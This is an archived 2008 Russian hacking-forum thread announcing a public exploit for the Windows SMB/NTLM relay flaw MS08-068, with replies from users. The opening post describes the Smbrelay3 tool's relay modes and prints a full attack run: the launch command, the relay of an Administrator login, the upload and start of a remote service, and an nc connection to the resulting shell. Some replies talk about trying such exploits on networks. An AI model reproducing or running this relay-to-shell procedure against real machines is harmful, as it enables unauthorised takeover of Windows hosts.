Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Windows (https://forum.antichat.xyz/forumdisplay.php?f=42)
-   -   Опубликован полнофункциональный эксплоит к уязвимости MS08-068 (https://forum.antichat.xyz/showthread.php?t=92337)

[:|||||:] 18.11.2008 11:51

Опубликован полнофункциональный эксплоит к уязвимости MS08-068
 
В публичном доступе находится полнофункциональный эксплоит к уязвимости в реализации протокола SMB в Microsoft Windows. Проблема заключается в том, что NTLM позволяет пользователям отвечать на входящие подключения от других хостов и удачно аутентифицироваться на системе без знания пароля. Таким образом, если пользователь подключается к удаленной системе с помощью NTLM, существует возможность компрометации системы пользователя.

Эта аутентификационная схема используется в большом количестве протоколов, например HTTP. Также, существует функционал, позволяющий браузеру (iexplore) или системе (explorer) по умолчанию отправлять аутентификационные данные серверу, если сервер требует аутентификацию.

Smbrelay3 – утилита, которая позволяет злоумышленнику произвести следующие типы атак:

HTTP –> SMB – соединение с браузером и передача данных на SMB хост
SMB -> SMB – соединение с SMB системой и передача данных на другой хост
IMAP -> SMB – соединение с почтовым IMAP клиентом и передача данных на другой хост
POP3 -> SMB – соединение с почтовым POP3 клиентом и передача данных на другой хост
SMTP -> SMB – соединение с почтовым SMTP клиентом и передача данных на другой хост

Если полученные утилитой учетные данные принадлежат администратору системы, Smbrelay3 автоматически создает удаленную консоль на уязвимой системе.

Пример атаки:

Цитата:

C:\smbrelay3>smbrelay3.exe --ListForHTTPRequests --AlternativeHTTPPort 81

SmbRelay3 - SMB to SMB and HTTP to SMB replay attack
(c) 2007 - 2008 Andres Tarasco - atarasco@gmail.com
Website: http://www.tarasco.org

Listening HTTP thread at port 81
Accepted Connection - Replaying against 192.168.1.2
Read First HTTP Request...
Sending Default HTTP 401 Error response and asking for authentiation NTLM
Read Second HTTP Request with Auhorization Header..
Init HTTP to SMB attack - Connecting with: 192.168.1.2:445
Sending SMB Authentication Handshake
Received SMB Message with NTLM v2 packet
Sending NTLM Challenge from SMB Server to the HTTP Client
Received Final Authentication packet from remote HTTP Client
UserName: Administrator
DomainName: 192.168.1.36
WorkstationName: SERVIDOR
Trying to authenticate to remote SMB as Administrator
Sending Final SMB Authentication packet with NTLM Message type 3
SessionSetupAndX Completed
Authenticacion against 192.168.1.2 Succeed with username Administrator
Connecting against IPC$
Trying to connect to admin$
Creating Remote File smrs.exe under admin$
Writing File smrs.exe into admin$
Closing File handle - FID: 800f
Opening Remote Service Control Manager pipe \svcctl
Sending RPC BindRequest to SCM pipe
Reading Response from Binding Request
Opening Remote Service Control Manager
Creating Remote Service
Opening Remote Service
Starting Remote Service...
Now Remote Service is executed... Try to connect to 192.168.1.2:8080

C:\smbrelay3>nc 192.168.1.2 8080
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>
Smbrelay3 можно скачать по адресу:
хэк

В настоящий момент в публичном доступе находятся следующие эксплоиты к уязвимости MS08-068:
MS Windows SMBRelay MitM Attack Exploit (MS08-068)
Microsoft Windows SMB Relay Code Execution Exploit (MS08-068)
Microsoft Windows SMB Relay Code Execution Exploit #3 (MS08-068)

Для удачной эксплуатации уязвимости целевой пользователь должен подключиться к злонамеренному серверу.

Cthulchu 18.11.2008 12:47

и, соответственно, - все антивири тоже восхитились данной уязвимостью и моментально добавили свои заплатки. В итоге, - толку нету.

Ponchik 19.11.2008 00:13

Ну да, MS04-011 дасихпор катит а это так ваще... Особено в сетях где антивирей нифига нету

swt1 19.11.2008 02:27

скачал,ща тестю в своей сети ;)
MS04-011 прошол на ура :D

.dimoN. 19.11.2008 19:19

Чет я не понял, где в строке C:\smbrelay3>smbrelay3.exe --ListForHTTPRequests --AlternativeHTTPPort 81 мы указываем что нужно ломится на 192.168.1.2 ? нипанятна. это я должен зайти на определенный сайт и запустить с этими параметрами? Вобщем подскажите как в локалке заюзать

Cthulchu 19.11.2008 20:00

ван миллион долларз? нипанятна-а-а-а...


Время: 18:23